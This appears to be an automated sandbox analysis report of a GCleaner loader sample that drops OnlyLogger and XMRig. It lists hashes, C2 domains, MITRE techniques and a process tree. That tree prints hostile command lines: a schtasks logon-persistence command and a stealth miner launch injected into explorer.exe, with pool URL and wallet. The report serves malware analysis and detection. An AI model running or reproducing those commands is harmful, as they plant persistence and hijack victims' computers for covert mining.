gcleaner | 5e2feff937da52c7caa0ee241a71d7d032866ebab913e3fd83028051a020c9ad

General

Target

5d33584d5dfa1eb57d4b5915d7b5c86e_JaffaCakes118.exe
Size

1.4MB
MD5

5d33584d5dfa1eb57d4b5915d7b5c86e
SHA1

1333239d95ae4eb3d95b8ef1a77a67eaa373cd88
SHA256

5e2feff937da52c7caa0ee241a71d7d032866ebab913e3fd83028051a020c9ad
SHA512

560e887867c56bf53987bee5738fe659d21869ee4f9b41c352b28403e4ea5dfa007ccebcb6ccff329e9c5adf396976da8bfe4945d656e3c27c9bca176f71fc86
SSDEEP

24576:G1e9yBNlug9312KoVPsT6npmwhw042QgWQqY:h9sNQSYKoVkT6n4whwL2QgWi

Score

10^/10

gcleaner onlylogger xmrig discovery loader miner

Malware Config

Extracted

Family

gcleaner

C2

ggc-partners.top

ggc-partners.in

Signatures

GCleaner
GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.
loader gcleaner
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
loader onlylogger
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

OnlyLogger payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2264-95-0x0000000000400000-0x0000000002C7F000-memory.dmp	family_onlylogger

XMRig Miner payload 10 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/5056-131-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/5056-130-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/5056-135-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/5056-136-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/5056-137-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/5056-134-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/5056-138-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/5056-139-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/5056-140-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/5056-146-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

5d33584d5dfa1eb57d4b5915d7b5c86e_JaffaCakes118.exe3002.exeChrome 5.exeservices64.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	5d33584d5dfa1eb57d4b5915d7b5c86e_JaffaCakes118.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	3002.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	Chrome 5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	services64.exe

Executes dropped EXE 10 IoCs

Processes:

Chrome 5.exe3002.exedcc7975c8a99514da06323f0994cd79b.exejhuuee.exeNGlorySetp.exesetup.exeBearVpn 3.exe3002.exeservices64.exesihost64.exe

pid	process
4504	Chrome 5.exe
4468	3002.exe
3172	dcc7975c8a99514da06323f0994cd79b.exe
4584	jhuuee.exe
2336	NGlorySetp.exe
2264	setup.exe
4184	BearVpn 3.exe
2188	3002.exe
4588	services64.exe
2296	sihost64.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs

Web Service

T1102

Processes:

flow	ioc
129	pastebin.com
11	iplogger.org
12	iplogger.org
14	iplogger.org
15	iplogger.org
119	raw.githubusercontent.com
120	raw.githubusercontent.com
128	pastebin.com

Suspicious use of SetThreadContext 1 IoCs

Processes:

services64.exe

description pid process target process

PID 4588 set thread context of 5056 4588 services64.exe explorer.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

description	pid	process	target process
PID 4588 set thread context of 5056	4588	services64.exe	explorer.exe

Program crash 12 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
4156	4184	WerFault.exe	BearVpn 3.exe
3788	2264	WerFault.exe	setup.exe
5108	2264	WerFault.exe	setup.exe
5048	2264	WerFault.exe	setup.exe
3088	2264	WerFault.exe	setup.exe
4336	2264	WerFault.exe	setup.exe
4968	2264	WerFault.exe	setup.exe
836	2264	WerFault.exe	setup.exe
1116	2264	WerFault.exe	setup.exe
4388	2264	WerFault.exe	setup.exe
3312	2264	WerFault.exe	setup.exe
4644	2264	WerFault.exe	setup.exe

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

3002.exe5d33584d5dfa1eb57d4b5915d7b5c86e_JaffaCakes118.exe3002.exesetup.exeBearVpn 3.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3002.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	5d33584d5dfa1eb57d4b5915d7b5c86e_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3002.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BearVpn 3.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exeschtasks.exe

pid process

2200 schtasks.exe
2032 schtasks.exe

pid	process
2200	schtasks.exe
2032	schtasks.exe

Suspicious behavior: EnumeratesProcesses 57 IoCs

Processes:

Chrome 5.exeservices64.exeexplorer.exe

pid	process
4504	Chrome 5.exe
4504	Chrome 5.exe
4588	services64.exe
5056	explorer.exe
5056	explorer.exe
5056	explorer.exe
5056	explorer.exe
5056	explorer.exe
5056	explorer.exe
5056	explorer.exe
5056	explorer.exe
5056	explorer.exe
5056	explorer.exe
5056	explorer.exe
5056	explorer.exe
5056	explorer.exe
5056	explorer.exe
5056	explorer.exe
5056	explorer.exe
5056	explorer.exe
5056	explorer.exe
5056	explorer.exe
5056	explorer.exe
5056	explorer.exe
5056	explorer.exe
5056	explorer.exe
5056	explorer.exe
5056	explorer.exe
5056	explorer.exe
5056	explorer.exe
5056	explorer.exe
5056	explorer.exe
5056	explorer.exe
5056	explorer.exe
5056	explorer.exe
5056	explorer.exe
5056	explorer.exe
5056	explorer.exe
5056	explorer.exe
5056	explorer.exe
5056	explorer.exe
5056	explorer.exe
5056	explorer.exe
5056	explorer.exe
5056	explorer.exe
5056	explorer.exe
5056	explorer.exe
5056	explorer.exe
5056	explorer.exe
5056	explorer.exe
5056	explorer.exe
5056	explorer.exe
5056	explorer.exe
5056	explorer.exe
5056	explorer.exe
5056	explorer.exe
5056	explorer.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

dcc7975c8a99514da06323f0994cd79b.exeNGlorySetp.exeBearVpn 3.exeChrome 5.exeservices64.exeexplorer.exe

description	pid	process
Token: SeDebugPrivilege	3172	dcc7975c8a99514da06323f0994cd79b.exe
Token: SeDebugPrivilege	2336	NGlorySetp.exe
Token: SeDebugPrivilege	4184	BearVpn 3.exe
Token: SeDebugPrivilege	4504	Chrome 5.exe
Token: SeDebugPrivilege	4588	services64.exe
Token: SeLockMemoryPrivilege	5056	explorer.exe
Token: SeLockMemoryPrivilege	5056	explorer.exe

Suspicious use of WriteProcessMemory 47 IoCs

Processes:

5d33584d5dfa1eb57d4b5915d7b5c86e_JaffaCakes118.exe3002.exeChrome 5.execmd.exeservices64.execmd.exe

description	pid	process	target process
PID 3152 wrote to memory of 4504	3152	5d33584d5dfa1eb57d4b5915d7b5c86e_JaffaCakes118.exe	Chrome 5.exe
PID 3152 wrote to memory of 4504	3152	5d33584d5dfa1eb57d4b5915d7b5c86e_JaffaCakes118.exe	Chrome 5.exe
PID 3152 wrote to memory of 4468	3152	5d33584d5dfa1eb57d4b5915d7b5c86e_JaffaCakes118.exe	3002.exe
PID 3152 wrote to memory of 4468	3152	5d33584d5dfa1eb57d4b5915d7b5c86e_JaffaCakes118.exe	3002.exe
PID 3152 wrote to memory of 4468	3152	5d33584d5dfa1eb57d4b5915d7b5c86e_JaffaCakes118.exe	3002.exe
PID 3152 wrote to memory of 3172	3152	5d33584d5dfa1eb57d4b5915d7b5c86e_JaffaCakes118.exe	dcc7975c8a99514da06323f0994cd79b.exe
PID 3152 wrote to memory of 3172	3152	5d33584d5dfa1eb57d4b5915d7b5c86e_JaffaCakes118.exe	dcc7975c8a99514da06323f0994cd79b.exe
PID 3152 wrote to memory of 4584	3152	5d33584d5dfa1eb57d4b5915d7b5c86e_JaffaCakes118.exe	jhuuee.exe
PID 3152 wrote to memory of 4584	3152	5d33584d5dfa1eb57d4b5915d7b5c86e_JaffaCakes118.exe	jhuuee.exe
PID 3152 wrote to memory of 2336	3152	5d33584d5dfa1eb57d4b5915d7b5c86e_JaffaCakes118.exe	NGlorySetp.exe
PID 3152 wrote to memory of 2336	3152	5d33584d5dfa1eb57d4b5915d7b5c86e_JaffaCakes118.exe	NGlorySetp.exe
PID 3152 wrote to memory of 2264	3152	5d33584d5dfa1eb57d4b5915d7b5c86e_JaffaCakes118.exe	setup.exe
PID 3152 wrote to memory of 2264	3152	5d33584d5dfa1eb57d4b5915d7b5c86e_JaffaCakes118.exe	setup.exe
PID 3152 wrote to memory of 2264	3152	5d33584d5dfa1eb57d4b5915d7b5c86e_JaffaCakes118.exe	setup.exe
PID 3152 wrote to memory of 4184	3152	5d33584d5dfa1eb57d4b5915d7b5c86e_JaffaCakes118.exe	BearVpn 3.exe
PID 3152 wrote to memory of 4184	3152	5d33584d5dfa1eb57d4b5915d7b5c86e_JaffaCakes118.exe	BearVpn 3.exe
PID 3152 wrote to memory of 4184	3152	5d33584d5dfa1eb57d4b5915d7b5c86e_JaffaCakes118.exe	BearVpn 3.exe
PID 4468 wrote to memory of 2188	4468	3002.exe	3002.exe
PID 4468 wrote to memory of 2188	4468	3002.exe	3002.exe
PID 4468 wrote to memory of 2188	4468	3002.exe	3002.exe
PID 4504 wrote to memory of 4548	4504	Chrome 5.exe	cmd.exe
PID 4504 wrote to memory of 4548	4504	Chrome 5.exe	cmd.exe
PID 4548 wrote to memory of 2200	4548	cmd.exe	schtasks.exe
PID 4548 wrote to memory of 2200	4548	cmd.exe	schtasks.exe
PID 4504 wrote to memory of 4588	4504	Chrome 5.exe	services64.exe
PID 4504 wrote to memory of 4588	4504	Chrome 5.exe	services64.exe
PID 4588 wrote to memory of 2996	4588	services64.exe	cmd.exe
PID 4588 wrote to memory of 2996	4588	services64.exe	cmd.exe
PID 4588 wrote to memory of 2296	4588	services64.exe	sihost64.exe
PID 4588 wrote to memory of 2296	4588	services64.exe	sihost64.exe
PID 2996 wrote to memory of 2032	2996	cmd.exe	schtasks.exe
PID 2996 wrote to memory of 2032	2996	cmd.exe	schtasks.exe
PID 4588 wrote to memory of 5056	4588	services64.exe	explorer.exe
PID 4588 wrote to memory of 5056	4588	services64.exe	explorer.exe
PID 4588 wrote to memory of 5056	4588	services64.exe	explorer.exe
PID 4588 wrote to memory of 5056	4588	services64.exe	explorer.exe
PID 4588 wrote to memory of 5056	4588	services64.exe	explorer.exe
PID 4588 wrote to memory of 5056	4588	services64.exe	explorer.exe
PID 4588 wrote to memory of 5056	4588	services64.exe	explorer.exe
PID 4588 wrote to memory of 5056	4588	services64.exe	explorer.exe
PID 4588 wrote to memory of 5056	4588	services64.exe	explorer.exe
PID 4588 wrote to memory of 5056	4588	services64.exe	explorer.exe
PID 4588 wrote to memory of 5056	4588	services64.exe	explorer.exe
PID 4588 wrote to memory of 5056	4588	services64.exe	explorer.exe
PID 4588 wrote to memory of 5056	4588	services64.exe	explorer.exe
PID 4588 wrote to memory of 5056	4588	services64.exe	explorer.exe
PID 4588 wrote to memory of 5056	4588	services64.exe	explorer.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\5d33584d5dfa1eb57d4b5915d7b5c86e_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\5d33584d5dfa1eb57d4b5915d7b5c86e_JaffaCakes118.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3152

C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4504

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:4548

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
4⤵
- Scheduled Task/Job: Scheduled Task
PID:2200

C:\Users\Admin\AppData\Roaming\services64.exe
"C:\Users\Admin\AppData\Roaming\services64.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4588

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
4⤵
- Suspicious use of WriteProcessMemory
PID:2996

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
5⤵
- Scheduled Task/Job: Scheduled Task
PID:2032

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
4⤵
- Executes dropped EXE
PID:2296

C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5056

C:\Users\Admin\AppData\Local\Temp\3002.exe
"C:\Users\Admin\AppData\Local\Temp\3002.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4468

C:\Users\Admin\AppData\Local\Temp\3002.exe
"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a
3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2188

C:\Users\Admin\AppData\Local\Temp\dcc7975c8a99514da06323f0994cd79b.exe
"C:\Users\Admin\AppData\Local\Temp\dcc7975c8a99514da06323f0994cd79b.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3172

C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
2⤵
- Executes dropped EXE
PID:4584

C:\Users\Admin\AppData\Local\Temp\NGlorySetp.exe
"C:\Users\Admin\AppData\Local\Temp\NGlorySetp.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2336

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2264

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 792
3⤵
- Program crash
PID:3788

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 800
3⤵
- Program crash
PID:5108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 836
3⤵
- Program crash
PID:5048

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 820
3⤵
- Program crash
PID:3088

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 956
3⤵
- Program crash
PID:4336

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 1184
3⤵
- Program crash
PID:4968

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 1348
3⤵
- Program crash
PID:836

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 1364
3⤵
- Program crash
PID:1116

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 1568
3⤵
- Program crash
PID:4388

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 1028
3⤵
- Program crash
PID:3312

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 1140
3⤵
- Program crash
PID:4644

C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4184

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4184 -s 1676
3⤵
- Program crash
PID:4156

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 176 -p 4184 -ip 4184
1⤵
PID:3504

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2264 -ip 2264
1⤵
PID:5028

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2264 -ip 2264
1⤵
PID:4324

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2264 -ip 2264
1⤵
PID:3564

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 2264 -ip 2264
1⤵
PID:3576

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2264 -ip 2264
1⤵
PID:1124

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2264 -ip 2264
1⤵
PID:4280

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 2264 -ip 2264
1⤵
PID:2988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 2264 -ip 2264
1⤵
PID:2568

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2264 -ip 2264
1⤵
PID:4672

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2264 -ip 2264
1⤵
PID:3060

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 2264 -ip 2264
1⤵
PID:732

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Persistence

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Privilege Escalation

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\3002.exe

Filesize
56KB

MD5
e511bb4cf31a2307b6f3445a869bcf31

SHA1
76f5c6e8df733ac13d205d426831ed7672a05349

SHA256
56002017746f61eee8d8e9b5ad2f3cbb119dc99300c5b6d32c1be184d3e25137

SHA512
9c81de34bf3b0eb75405c726d641ef6090054e9be8e0c0ab1bb2ed095e6477ce2fa8996868bf8a77a720b210a76b5f4e1b3b086d7f40449d79498681b367199c

Download Submit
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe

Filesize
6KB

MD5
e4ff121d36dff8e94df4e718ecd84aff

SHA1
b84af5dae944bbf34d289d7616d2fef09dab26b7

SHA256
2a019bc6bace686b08286ee7d8e2e66c18283b162d27774c486037c940dc60cc

SHA512
141f12468cfe737b3694a4ece8f17c5d35bbade05ee0538fe4ef4fccf61584374f79a474fd4bf82685a4840afd94e9a9bbd9c9f357cb342dda9f89109c4da5f4

Download Submit
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe

Filesize
43KB

MD5
93460c75de91c3601b4a47d2b99d8f94

SHA1
f2e959a3291ef579ae254953e62d098fe4557572

SHA256
0fdba84fe8ed2cf97023c544d3f0807dbb12840c8e7d445a3a4f55174d78b5b2

SHA512
4370ae1a1fc10c91593839c51d0fbae5c0838692f95e03cac315882b026e70817b238f7fe7d9897049856469b038acc8ccfd73aae1af5775bfef35bde2bf7856

Download Submit
C:\Users\Admin\AppData\Local\Temp\NGlorySetp.exe

Filesize
155KB

MD5
f92a7e6e19ff5d2837d2ddfd42b87228

SHA1
d44150b815d4cd3c57d837db05a72798e2d4a895

SHA256
984911d2a754b8beb85c44a0cfd156d501dceca1b257ebc1988279c4059b88ca

SHA512
fbaa18a235b998d42210fe8f90d5c90c1aee8c3eee7f1010a6c5d1feb6ca89e719f149225a6de3af0165ae7d8f8bd0bf27004ad2c78f9e25d4679f454e16fe8f

Download Submit
C:\Users\Admin\AppData\Local\Temp\dcc7975c8a99514da06323f0994cd79b.exe

Filesize
8KB

MD5
b4d6498c4aecc1674c710ffd3708f97d

SHA1
fa1b3fdea4780cf885a79c286a9cf99316a91bd0

SHA256
9641cd2b09c5c44cf32f480d8eaf99bc756623a4c7bf93f67fbc0f8f789cac17

SHA512
d0d21c7bd181dbeaa3214842206fa870852851a42819e9ce46b1a4dc3b1f0d7c18a06303340e081900f0270fd37be9e4fa9378c7e4f574e3a7803d25169e8333

Download Submit
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe

Filesize
900KB

MD5
a3e75b6fda5826af709b5e488e7cd9e7

SHA1
2fce3251b18ff02a06083aa8a037def64a604a78

SHA256
8fa23d5fe37e7e0aed12a8917dfb43c186d26771a70c3afcc2f8a540df7b1b46

SHA512
6d1f37799f510a0e7fc6bf19a13425aa1225754d654dbc20c84a147161c03d63d5acf9cb7603c22c7533d5ab060ddc12c4c45d4e238f4368e8504514416efc41

Download Submit
C:\Users\Admin\AppData\Local\Temp\setup.exe

Filesize
292KB

MD5
9fb43793d920675f2206684ce497c71c

SHA1
8ac43752f148bebadf6aee32bbb3979b29fa582d

SHA256
46c07435715fa529694ef536db780f9153984c9ecb8a3adc1182e03336d44b01

SHA512
bb19df09f5cd9fde50a694fb340b1aff55609a74b879debcf9b050cc1de682232dc060517682198670d8fbe8cd8adb61809387c49ecb4067c0cf608fb85f2bb9

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

Filesize
7KB

MD5
339347f8a4bc7137b6a6a485f6cd0688

SHA1
9b198dc642f9f32ea38884d47c1fe7d8868e3f39

SHA256
c6f8eec2d3204bad0712705405fdb09555bf2bc26f83f0cf1d7966b86a46f601

SHA512
04c73aa7cff15895daf42119873df920e2ee9500d1293f470ad590cbd9cccf09f6df206f1aa9fa09e744f404f5365174f570a7f33a9a642453531dcfbaeb26fd

Download Submit
memory/2264-95-0x0000000000400000-0x0000000002C7F000-memory.dmp

Filesize
40.5MB

Download
memory/2296-128-0x0000000000D10000-0x0000000000D16000-memory.dmp

Filesize
24KB

Download
memory/2336-85-0x00000000013B0000-0x00000000013B6000-memory.dmp

Filesize
24KB

Download
memory/2336-64-0x0000000000BC0000-0x0000000000BEC000-memory.dmp

Filesize
176KB

Download
memory/2336-70-0x0000000001380000-0x0000000001386000-memory.dmp

Filesize
24KB

Download
memory/2336-75-0x0000000001390000-0x00000000013B0000-memory.dmp

Filesize
128KB

Download
memory/3152-0-0x000000007535E000-0x000000007535F000-memory.dmp

Filesize
4KB

Download
memory/3152-1-0x0000000000DB0000-0x0000000000F26000-memory.dmp

Filesize
1.5MB

Download
memory/3172-37-0x0000000000070000-0x0000000000078000-memory.dmp

Filesize
32KB

Download
memory/3172-60-0x00007FFBAC3A0000-0x00007FFBACE61000-memory.dmp

Filesize
10.8MB

Download
memory/4184-88-0x0000000000F00000-0x0000000000F08000-memory.dmp

Filesize
32KB

Download
memory/4504-97-0x0000000000E50000-0x0000000000E5E000-memory.dmp

Filesize
56KB

Download
memory/4504-98-0x0000000000E80000-0x0000000000E92000-memory.dmp

Filesize
72KB

Download
memory/4504-15-0x0000000000490000-0x00000000004A0000-memory.dmp

Filesize
64KB

Download
memory/4504-14-0x00007FFBAC3A3000-0x00007FFBAC3A5000-memory.dmp

Filesize
8KB

Download
memory/5056-130-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/5056-131-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/5056-132-0x0000000000B30000-0x0000000000B50000-memory.dmp

Filesize
128KB

Download
memory/5056-135-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/5056-136-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/5056-137-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/5056-134-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/5056-138-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/5056-139-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/5056-140-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/5056-146-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads